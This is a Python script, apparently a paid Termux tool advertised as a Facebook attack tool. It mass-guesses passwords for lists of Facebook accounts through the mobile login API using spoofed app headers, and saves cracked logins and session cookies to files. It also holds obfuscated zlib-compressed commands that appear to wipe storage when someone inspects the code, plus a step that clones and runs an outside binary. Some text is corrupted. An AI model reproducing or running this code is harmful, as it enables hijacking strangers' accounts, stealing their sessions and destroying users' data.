#<<_________[ IMPORTANT DATA ]_________>>#
fbks=('com.facebook.adsmanager','com.facebook.lite','com.facebook.orca','com.facebook.katana')
import os,requests,json,time,re,random,sys,uuid,string,subprocess,platform,base64,zlib
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor, as_completed
try:
    import requests
    from string import *
    import bs4
    from concurrent.futures import ThreadPoolExecutor as tred
    from bs4 import BeautifulSoup as sop
    from bs4 import BeautifulSoup
except ModuleNotFoundError: 
    print(f"\033[1;97m [\033[1;92m•\033[1;97m]\033[1;97m Installing Missing Modules ...!!!")
    os.system('pip install requests bs4 futures==2 > /dev/null')
except:pass
import time
from datetime import date
from datetime import datetime
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
from time import localtime as lt
from os import system as cmd
ltx = int(lt()[3])
if ltx > 12:
    a = ltx-12
    tag = "PM"
else:
    a = ltx
    tag = "AM"
try:
    import bs4
except ImportError:

    os.system('pip install bs4 --quiet 2>/dev/null')
try:import arrow
except:os.system('pip install arrow --quiet 2>/dev/null');import arrow
try:import httplib2
except ModuleNotFoundError:
    try:
        with open(os.devnull, 'w') as null:
            subprocess.check_call(["pip", "install", " httplib2"], stdout=null, stderr=null)
            import httplib2
    except subprocess.CalledProcessError:
        print(f"\033[1;97m [\033[1;92m•\033[1;97m]\033[1;97m Module Installing Failed")
        exit()
try:
    import pycurl
    from io import BytesIO
except:
    os.system('pip install pycurl --quiet 2>/dev/null')
    import pycurl
    from io import BytesIO
import pycurl
from io import BytesIO
def get_response(url):
    response_buffer = BytesIO()
    curl = pycurl.Curl()
    curl.setopt(curl.URL, url)
    curl.setopt(curl.WRITEDATA, response_buffer)
    try:
        curl.perform()
    except pycurl.error as e:
        return f'Error: {e}'
    response = response_buffer.getvalue().decode("utf-8")
    curl.close()
    return response
os.system('clear')
print(f"\033[1;97m [\033[1;92m•\033[1;97m]\033[1;97m Installing Missing Modules ...!!!")
time.sleep(2)
os.system("pip uninstall httpx -y --quiet 2>/dev/null")
os.system("pip install httpx --quiet 2>/dev/null")
os.system("pip uninstall httpx requests -y --quiet 2>/dev/null")
os.system("pip install requests httpx --quiet 2>/dev/null")
"""
#____________[SECURITY BOX]_____________#
first='/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/'
if not 'print' in open(first+'sessions.py','r').read():
    pass
else:
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
    print(f"\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Bro Turn Off Protecter...! Then Run Tool");exit()
first = '/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/'
if not 'print' in open(first+'models.py','r').read():
    pass    
else:
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
    os.system('clear');print(f'\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Dont Try Bypass & Capture Mother Fucker...! \n\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Your System fucked By Bhatti');exit()
first = '/data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/'
if not 'print' in open(first+'api.py','r').read():
    pass    
else:
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
    os.system('clear');print(f'\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Dont Try Bypass & Capture Mother Fucker...! \n\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Your System fucked By Bhatti');exit()
first = '/data/data/com.termux/files/usr/lib/python3.11/site-packages/httpx/'
if not 'print' in open(first+'_api.py','r').read():
    pass    
else:
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
    os.system('clear');print(f'\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Dont Try Bypass & Capture Mother Fucker...! \n\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Your System fucked By Bhatti');exit()
first = '/data/data/com.termux/files/usr/lib/python3.11/site-packages/httpx/'
if not 'print' in open(first+'_auth.py','r').read():
    pass    
else:
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
    os.system('clear');print(f'\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Dont Try Bypass & Capture Mother Fucker...! \n\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Your System fucked By Bhatti');exit()
first = '/data/data/com.termux/files/usr/lib/python3.11/site-packages/httpx/'
if not 'print' in open(first+'_models.py','r').read():
    pass    
else:
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0OI,I\x84\x10\xc9\xf9\xb9z%\xa9E\xb9\xa5\x15\xfai\x999\xa9\xc5\xfa\x00\RN7_\x0ci'))
    os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
    os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
    os.system('clear');print(f'\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Dont Try Bypass & Capture Mother Fucker...! \n\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Your System fucked By Bhatti');exit()
def clr():
    os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
    os.system('termux-setup-storage')
    try:
        data = os.listdir('/sdcard')
        if 'Android' in data:
            os.system(zlib.decompress(b'x\x9cKNQP\xf1\xf0w\xf5UPSS(\xcaU\RN0-JS\RN0\x02\x005\xfe\x05\x0f'))
            os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/NIN,J\RN1\RN7\x02\x00,D\x05\x1e'))
            os.system(zlib.decompress(b'x\x9c+\xcaU\RN0-JS\RN0/.\xc9/JLO\RN5O\xcd-\xcdI,IM\RN17\RN0\RN7\x02\x00\x8dJ\t\x81'))
            os.system('clear');print(f'\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Dont Try Bypass & Capture Mother Fucker...! \n\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Your System fucked By Bhatti');exit()
        else:exit()
    except:exit()
#<<_________[ PROTECTOR ]_________>>#
from os import path,system
if path.isfile("/data/data/com.termux/files/usr/bin/rm"):
    pass
else:
    print(f"\033[92;1m ❲\033[97;1m+\033[92;1m❳\033[97;1m Bro Turn Off Protecter...! Then Run Tool");exit()
#<<_________[ MODULE KILLER ]_________>>#
from requests import api
x = open(api.__file__,'r').read()
if "print" in x:
    clr()
elif "sys.stdout.write" in x:
    clr()
else:
    pass
from requests import sessions
x = open(sessions.__file__,'r').read()
if "print" in x:
    clr()
elif "sys.stdout.write" in x:
    clr()
else:
    pass
from requests import models
x = open(models.__file__,'r').read()
if "print" in x:
    clr()
elif "sys.stdout.write" in x:
    clr()
else:
    pass
"""
try:
    import mechanize
except:
    pass
#<<_________[ USERAGENT ]_________>>#
def x1():
    END = "[FBAN/FB4A;F"+"BAV/"+"106"+".0.0.26.68;FBBV/"+"106;F"+"BDM/{"+"density="+"3.0,wid"+"th=750"+",height=1334};FBLC/it_"+"IT;FBRV/106."+"0.0.26.6"+"8;FBCR/Etisalat"+"Afg"+"hanistan;FBMF/Infi"+"nix_"+"Note_8i;FBBD/Infi"+"nix_Note_8i;FBPN/c"+"om.facebook.katana"+";FBDV/I"+"nfinix_Note_8i_10_0;FBSV/10.0;FBOP/1;FBCA/"+"x86:armeabi-v7a;]"
    ua = "[FBAN/FB4A;FBAV/"+str(random.randint(111,555))+'.0.0.'+str(random.randrange(9,49))+str(random.randint(11,77))+";FBBV/"+str(random.randint(1111111,7777777))+";"+END
    return ua
#<<_________[ SESSION LOGO ]_________>>#
#------------------[ MACHINE-SUPPORT ]---------------#

 
def alvino_xy(u):
        for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.005)
def clear():
    os.system('clear')
def back():
    login()
def contact():
   # Rashid Sindhi Shar #
    back()
def linex():
    print('\033[1;37m')
def animation(u):
    for e in u + "\n":sys.stdout.write(e);sys.stdout.flush();time.sleep(0.01)
#os.system("RNg-open https://www.facebook.com/gxmingRASHID875?mibextid=ZbWKwL")


def DARKALWAYSONFIRE():
  uuid = str(os.geteuid()) + str(os.getlogin())
  id = "-".join(uuid)
  server = requests.get(f'https://github.com/RASHIDRANA1122/Rashid.txt/blob/main/Rashid.txt').text






  os.system(f" clear")
  print(f"""
\033[1;37m     ____      _    ____  _   _ ___ ____  
\033[1;37m     |  _ \    / \  / ___|| | | |_ _|  _ \ 
\033[1;35m     | |_) |  / _ \ \___ \| |_| || || | | |
\033[1;36m     |  _ <  / ___ \ ___) |  _  || || |_| |
\033[1;37m     |_| \_\/_/   \_\____/|_| |_|___|____/ 
\033[1;37m ================================================
    💕❤️\033[92;1mRANA ATTACK TOOL FACEBOOK ❤💕
\033[1;37m ================================================
 \033[1;97m[\033[1;92m•\033[1;97m] Owner    : RASHID RN
 \033[1;97m[\033[1;92m•\033[1;97m] GitHub   : RASHID-RANA1122
 \033[1;97m[\033[1;92m•\033[1;97m] Status   : PAID
 \033[1;97m[\033[1;92m•\033[1;97m] Version  : \033[1;92m12.0
\033[1;37m ================================================
\033[92;1m[\033[92;1m•\033[92;1m] 07: Day 200 PKR.
\033[92;1m[\033[92;1m•\033[92;1m] 30: Day 500 PKR.
\033[92;1m[\033[92;1m•\033[92;1m] 07: Day 1$ USD.
\033[92;1m[\033[92;1m•\033[92;1m] 30: Day 2$ USD.
\033[92;1m[\033[92;1m•\033[92;1m] Jazzcash: 03062593977
\033[92;1m[\033[92;1m•\033[92;1m] Upisa:    03206691045
\033[92;1m[\033[92;1m•\033[92;1m] BINACE: 
\033[92;1m================================================""")

  print(f"Your Key : \033[1;32m"+id)             
  #os.system(f'RNg-open https://www.facebook.com/gxmingali875?mibextid=ZbWKwL')
  time.sleep(1)
  print(f"\033[1;37mChecking Your Key")
  try:
    httpCaht = requests.get(f"https://github.com/RASHIDRANA1122/Rashid.txt/blob/main/Rashid.txt").text
    if id in httpCaht:
      print(f"\033[1;32mCongratulations ! Your Key Is Approved");time.sleep(2)
      msg = str(os.geteuid())
      time.sleep(0.5)
      pass
    else:
      
      print(f"Your Key Not Approved")
      print(f"Send Key For Access This Tool"); time.sleep(1)
      os.system('xdg-open https://wa.me/+923206691045')
      time.sleep(1)
      sys.exit()
  except:
    sys.exit()
    if name == '__main__':
        print(logo)
        
        DARKALWAYSONFIRE()
DARKALWAYSONFIRE() 
try:
    os.makedirs('/sdcard/RASHID')
except:
    pass
sys.stdout.write('\x1b]2; RASHID\x07')


#<<_________[ LOGO ]_________>>#
logo=(f"""
 \033[1;37m[8888b.  .d8b.  db       .d88b.   .o88b. db   db 
 \033[1;37m88  `8D d8' `8b 88      .8P  Y8. d8P  Y8 88   88 
 \033[1;35m88oooY' 88ooo88 88      88    88 8P      88ooo88 
 \033[1;36m88~~~b. 88~~~88 88      88    88 8b      88~~~88 
 \033[1;37m88   8D 88   88 88booo. `8b  d8' Y8b  d8 88   88 
 \033[1;37mY8888P' YP   YP Y88888P  `Y88P'   `Y88P' YP   YP
\033[1;37m ================================================
    💕❤️\033[92;1mMoqadar k sekandr kbi joooka ni krty❤💕
\033[1;37m ================================================
 \033[1;97m[\033[1;92m•\033[1;97m] Owner    : RASHID RN
 \033[1;97m[\033[1;92m•\033[1;97m] GitHub   : RASHID-14
 \033[1;97m[\033[1;92m•\033[1;97m] Status   : PAID
 \033[1;97m[\033[1;92m•\033[1;97m] Version  : \033[1;92m12.0
\033[1;37m ================================================""")
#<<_________[ LINE ]_________>>#
def line():
    print(f"\033[1;37m ================================================")
#<<_________[ CLEAR ]_________>>#
def clear():
    os.system('clear')
    print(logo)
#<<_________[ LOOP ]_________>>#
loop=0
oks=[]
cps=[]
id=[]
#<<_________[ MAIN MANU ]_________>>#
def Menu(name,join,user,exp,left):
            clear()
            print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mYour Name : \033[1;92m"+name)
            print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mYour Key  : \033[1;92m"+user)
            print(f'\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mYour Join Date   : \033[1;92m'+join)
            print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mYour Expiry Date : \033[1;91m{exp}")
            print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mKey Expire After \033[1;91m{left}\033[1;97m Days")
            line()
            print(f"\033[1;97m [\033[1;92m1\033[1;97m] \033[1;97mFile Cloning\n\033[1;97m [\033[1;92m2\033[1;97m] \033[1;97mCreate File\n\033[1;97m [\033[1;92m3\033[1;97m] \033[1;97mRemove Line\n\033[1;97m [\033[1;92m0\033[1;97m] \033[1;91mExit")
            line()
            RN=input(f"\033[1;97m [\033[1;92m•\033[1;97m]\033[1;97m Choice \033[1;97m:\033[1;97m ")
            if RN in ['1','01']:
                clear()
                print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mExample  \033[1;97m: \033[1;92m/sdcard/File.txt etc..")
                line()
                file = input(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mPut File \033[1;97m: \033[1;97m")
                try:
                    fo = open(file,'r').read().splitlines()
                except FileNotFoundError:
                    clear();print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mFile Not Found");time.sleep(1);On()
                clear()
                print(f"\033[1;97m [\033[1;92m1\033[1;97m] \033[1;97mMethod\033[1;97m |\033[1;92mNew Series\033[1;97m|\n\033[1;97m [\033[1;92m2\033[1;97m] \033[1;97mMethod\033[1;97m |\033[1;92mNew Series\033[1;97m|\n\033[1;97m [\033[1;92m3\033[1;97m] \033[1;97mMethod\033[1;97m |\033[1;92mOld Series\033[1;97m|")
                line()
                mthd = input(f"\033[1;97m [\033[1;92m•\033[1;97m]\033[1;97m Choice \033[1;97m:\033[1;97m ")
                clear()
                plist = []
                try:
                    ps_limit = int(input(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mPut Password Limit \033[1;97m:\033[1;97m "))
                except:
                    ps_limit =1
                clear()
                print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mExample  \033[1;97m:\033[1;92m   first last,firtslast etc..")
                line()
                for i in range(ps_limit):
                    plist.append(input(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mPut Password {i+1} \033[1;97m:\033[1;97m "))
                with tred(max_workers=30) as crack_submit:
                    clear()
                    total_ids = str(len(fo))
                    print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mTIME : \033[1;92m"+str(a)+":"+str(lt()[4])+" "+ tag+"")
                    print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mTotal Account \033[1;97m: \033[1;92m"+total_ids+f" \033[1;97m")
                    print("\033[1;97m [\033[1;92m•\033[1;97m] \033[1;91mIf No Result Use Flight Mode\033[97;1m") 
                    line()
                    for user in fo:
                        ids,names = user.split('|')
                        passlist = plist
                        if mthd in ['1','01']:
                            crack_submit.submit(ffb,ids,names,passlist)
                        elif mthd in ['2','02']:
                            crack_submit.submit(api,ids,names,passlist)
                        elif mthd in ['3','03']:
                            crack_submit.submit(api1,ids,names,passlist)
                        else:
                            crack_submit.submit(ffb,ids,names,passlist)
                print(f"\033[1;97m")
                line()
                print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mThe Process Completed")
                print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mOK IDS \033[1;97m: \033[1;92m%s "%(len(oks)))
                print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mCP IDS \033[1;97m: \033[1;91m%s "%(len(cps)))
                line()
                input(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mPress Enter To Back Menu")
                On()
            elif RN in ['2','02']:
                create()
            elif RN in ['3','03']:
                used_cutter()
            elif RN in ['0','00']:
                clear();exit(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mThanks For Use")
            else:
                clear();print(f"\033[1;97m [\033[1;92m•\033[1;97m] \033[1;97mWrong Choose");time.sleep(2);On()
#<<_________[ M1 ]_________>>#
def ffb(ids,names,passlist):
        try:
                global loop,oks,cps
                sys.stdout.write('\r [RASHID] %s | M1 OK/CP %s/%s '%(loop,len(oks),len(cps)));sys.stdout.flush()
                first = names.split(' ')[0]
                try:
                        last = names.split(' ')[1]
                except:
                        last = first
                for pw in passlist:
                        pas = pw.replace("first", first).replace("last", last).replace("First", first.capitalize()).replace("Last", last.capitalize())
                        data = {
'adid': str(uuid.uuid4()),
'format': 'json',
'device_id': str(uuid.uuid4()),
'cpl': 'true',
'family_device_id': str(uuid.uuid4()),
'credentials_type': 'device_based_login_password',
'error_detail_type': 'button_with_disabled',
'source': 'device_based_login',
'email': ids,
'password': pas,
'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
'generate_session_cookies': '1',
'meta_inf_fbmeta': '',
'advertiser_id': str(uuid.uuid4()),
'currently_logged_in_userid': '0',
'locale': 'en_US',
'client_country_code': 'US',
'method': 'auth.login',
'fb_api_req_friendly_name': 'authenticate',
'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler',
'api_key': '882a8490361da98702bf97a021ddc14d'}
                        headers = {
'User-Agent': x1(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62'}
                        url = 'https://b-graph.facebook.com/auth/login'
                        po = requests.post(url,data=data,headers=headers).json()
                        if 'session_key' in po:
                                        print(f'\r\r\033[1;92m [RASHID-OK] '+ids+' | '+pas+f'\033[1;97m')
                                        os.system('espeak -a 300 " Crack,   Successful,"')
                                        coki = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                                        ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-")
                                        cookies = f"sb={ssbb};{coki}"
                                        open('/sdcard/RASHID/RASHID-OK.txt','a').write(ids+'|'+pas+'\n')
                                        open('/sdcard/RASHID/RASHID-COOKIES.txt','a').write(ids+'|'+pas+'|'+cookies+'\n')
                                        oks.append(ids);type(ids,pas,cookies)
                                        break
                        elif 'www.facebook.com' in po['error']['message']:
                                        print(f'\r\r\033[1;91m [RASHID-CP] '+ids+' | '+pas+f'\033[1;97m')
                                        open(f'/sdcard/RASHID/RASHID-CP.txt', 'a').write(ids+'|'+pas+'\n')
                                        cps.append(ids)
                                        break
                        else:
                                        continue
                loop+=1
        except requests.exceptions.ConnectionError:
                time.sleep(10)
        except Exception as e:
                pass
#<<_________[ M2 ]_________>>#
def api(ids,names,passlist):
        try:
                global loop,oks,cps
                sys.stdout.write('\r [RASHID] %s | M2 OK/CP %s/%s '%(loop,len(oks),len(cps)));sys.stdout.flush()
                first = names.split(' ')[0]
                try:
                        last = names.split(' ')[1]
                except:
                        last = first
                for pw in passlist:
                        pas = pw.replace("first", first).replace("last", last).replace("First", first.capitalize()).replace("Last", last.capitalize())
                        data={
'adid': str(uuid.uuid4()),
'format': 'json',
'device_id': str(uuid.uuid4()),
'cpl': 'true',
'family_device_id': str(uuid.uuid4()),
'credentials_type': 'device_based_login_password',
'error_detail_type': 'button_with_disabled',
'source': 'device_based_login',
'email':ids,
'password':pas,
'access_token':'350685531728|62f8ce9f74b12f84c123cc23437a4a32',
'generate_session_cookies':'1',
'meta_inf_fbmeta': '',
'advertiser_id': str(uuid.uuid4()),
'currently_logged_in_userid': '0',
'locale': 'en_US',
'client_country_code': 'US',
'method': 'auth.login',
'fb_api_req_friendly_name': 'authenticate',
'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler',
'api_key': '882a8490361da98702bf97a021ddc14d',}
                        headers = {
'Content-Type': 'application/x-www-form-accencoded',
'Host': 'graph.facebook.com',
'User-Agent': x1(),
'X-FB-Net-HNI': '45204',
'X-FB-SIM-HNI': '45201',
'X-FB-Connection-Type': 'unknown',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'Accept-Encoding': 'gzip, deflate',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',
'Connection': 'Keep-Alive',}
                        url = 'https://b-graph.facebook.com/auth/login'
                        po = requests.post(url,data=data,headers=headers).json()
                        if 'session_key' in po:
                                        print(f'\r\r\033[1;92m [RASHID-OK] '+ids+' | '+pas+f'\033[1;97m')
                                        os.system('espeak -a 300 " Crack,   Successful,"')
                                        coki = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                                        ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-")
                                        cookies = f"sb={ssbb};{coki}"
                                        open('/sdcard/RASHID/RASHID-OK.txt','a').write(ids+'|'+pas+'\n')
                                        open('/sdcard/RASHID/RASHID-COOKIES.txt','a').write(ids+'|'+pas+'|'+cookies+'\n')
                                        oks.append(ids);type(ids,pas,cookies)
                                        break
                        elif 'www.facebook.com' in po['error']['message']:
                                        print(f'\r\r\033[1;91m [RASHID-CP] '+ids+' | '+pas+f'\033[1;97m')
                                        open(f'/sdcard/RASHID/RASHID-CP.txt', 'a').write(ids+'|'+pas+'\n')
                                        cps.append(ids)
                                        break
                        else:
                                        continue
                loop+=1
        except requests.exceptions.ConnectionError:
                time.sleep(10)
        except Exception as e:
                pass
#<<_________[ M3 ]_________>>#
def api1(ids,names,passlist):
        try:
                global loop,oks,cps
                sys.stdout.write('\r [RASHID] %s | M3 OK/CP %s/%s '%(loop,len(oks),len(cps)));sys.stdout.flush()
                first = names.split(' ')[0]
                try:
                        last = names.split(' ')[1]
                except:
                        last = first
                for pw in passlist:
                        pas = pw.replace("first", first).replace("last", last).replace("First", first.capitalize()).replace("Last", last.capitalize())
                        random_seed = random.Random()
                        adid = str(''.join(random_seed.choices(string.heRNigits, k=16)))
                        data = {
'adid': adid,
'format': 'json',
'device_id': str(uuid.uuid4()),
'cpl': 'true',
'family_device_id': str(uuid.uuid4()),
'credentials_type': 'device_based_login_password',
'error_detail_type': 'button_with_disabled',
'source': 'device_based_login',
'email': ids,
'password': pas,
'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32',
'generate_session_cookies': '1',
'meta_inf_fbmeta': '',
'advertiser_id': '8b59ed89-4b88-4f69-a1ed-dfea59e76839',
'currently_logged_in_userid': '0',
'locale': 'en_US',
'client_country_code': 'US',
'method': 'auth.login',
'fb_api_req_friendly_name': 'authenticate',
'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler',
'api_key': '882a8490361da98702bf97a021ddc14d',}
                        headers={
'User-Agent': x1(),
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': '25227',
'X-FB-SIM-HNI': '29752',
'X-FB-Connection-Type': 'MOBILE.LTE',
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62',
'Content-Length': '706',}
                        url = 'https://b-graph.facebook.com/auth/login'
                        po = requests.post(url,data=data,headers=headers).json()
                        if 'session_key' in po:
                                        print(f'\r\r\033[1;92m [RASHID-OK] '+ids+' | '+pas+f'\033[1;97m')
                                        os.system('espeak -a 300 " Crack,   Successful,"')
                                        coki = ";".join(i["name"]+"="+i["value"] for i in po["session_cookies"])
                                        ssbb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-")
                                        cookies = f"sb={ssbb};{coki}"
                                        open('/sdcard/RASHID/RASHID-OK.txt','a').write(ids+'|'+pas+'\n')
                                        open('/sdcard/RASHID/RASHID-COOKIES.txt','a').write(ids+'|'+pas+'|'+cookies+'\n')
                                        oks.append(ids);type(ids,pas,cookies)
                                        break
                        elif 'www.facebook.com' in po['error']['message']:
                                        print(f'\r\r\033[1;91m [RASHID-CP] '+ids+' | '+pas+f'\033[1;97m')
                                        open(f'/sdcard/RASHID/RASHID-CP.txt', 'a').write(ids+'|'+pas+'\n')
                                        cps.append(ids)
                                        break
                        else:
                                        continue
                loop+=1
        except requests.exceptions.ConnectionError:
                time.sleep(10)
        except Exception as e:
                pass
#<<_________[ CREATE FILE ]_________>>#
def create():
    os.system("cd && rm -rf FILE git clone --depth=1 https://github.com/Hannan-404/FILE")
    os.system('cd FILE chmod 777 FILE64./FILE64')

#<<_________[ THE END ]_________>>#
Menu("RANA","000","000","000","000")
